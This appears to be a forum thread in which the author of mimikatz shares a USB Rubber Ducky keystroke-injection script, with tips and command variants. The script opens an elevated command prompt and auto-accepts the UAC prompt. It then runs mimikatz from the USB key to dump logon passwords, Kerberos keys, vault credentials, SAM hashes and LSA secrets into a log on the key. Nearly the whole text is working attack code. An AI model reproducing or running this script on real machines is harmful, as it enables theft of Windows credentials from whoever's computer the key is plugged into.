gentilkiwi

Of course it works too, but it's much slower ;) do your own mimikatz version ! (open source)

Heureusement je peux facilement te comprendre ;) Never seen that... but you can try to add : ALT-TAB DELAY 500 Before the ALT o / ALT y ;) Not focused or focused, it can't be so bad, no ? let me know ;)

It seems you don't have UAC ;) otherwise ALT o will valid the UAC prompt ;)

'ALT o' is to bypass UAC in French ;), replace it with 'y' for English If no UAC, you can remove it ;)

Hi everybody After the gift from Darren @ Defcon, I have now made my own key ;) - I use cm_duck.hex Enjoy my script, and let me know if any improvement needed (be nice, it's my first one ) DELAY 2000 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb RunAs ENTER DELAY 1500 ALT o DELAY 250 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "MIMIKEY"') do set MIMIKEY=%d ENTER DELAY 500 STRING cd /d %MIMIKEY%\ ENTER DELAY 500 STRING mimikatz_%PROCESSOR_ARCHITECTURE% "log %computername%.log" version privilege::debug sekurlsa::logonpasswords sekurlsa::ekeys vault::cred vault::list token::elevate lsadump::sam lsadump::secrets vault::cred vault::list answer exit ENTER DELAY 500 STRING exit ENTER You only need at the root of the key: mimikatz_x86.exe mimikatz_amd64.exe mimikatz will create a %computername%.log at the root of the key ;) It's faster than redirection.

If you cd %duck% before, you can use : mimikatz privilege::debug log sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit mimikatz privilege::debug "log filename.log" sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit mimikatz privilege::debug sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit > filename.log